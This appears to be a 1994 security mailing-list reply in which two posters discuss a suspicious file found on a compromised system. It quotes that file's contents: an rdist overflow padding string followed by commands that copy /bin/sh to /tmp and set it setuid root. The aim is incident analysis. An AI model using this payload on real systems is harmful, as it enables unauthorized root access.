In message <199403310455.UAA15234@merde.dis.org>, Evil Pete writes: >sounds like Crackers to me, not a virus. > Could be, but that should be easy to find out... >if foosh contains some thing like > > Taaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa > aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa > aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa > aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa > aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa > aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa > aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa > aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa > Qaaaaaaaaaaaaaaaaaaaaaaaaaa > Qaaaaaaaaaaaaaaaaaaaaaaaaa > Qaaaaaaaaaaaaaaaaaaaaaaaa > Qaaaaaaaaaaaaaaaaaaaaaaa > Scp /bin/sh /tmp/foosh > Schmod 4755 /tmp/foosh > > >then it was something a person used to get root through a old hole in rdist >(when I look for the file foosh I found it in my directory of security toys) > > >as for jnk.tmp I am not sure yet. > Besides, they could have a virus that exploits that bug (or maybe some others too, like the evq driver) so as to infect more files. -Aggelos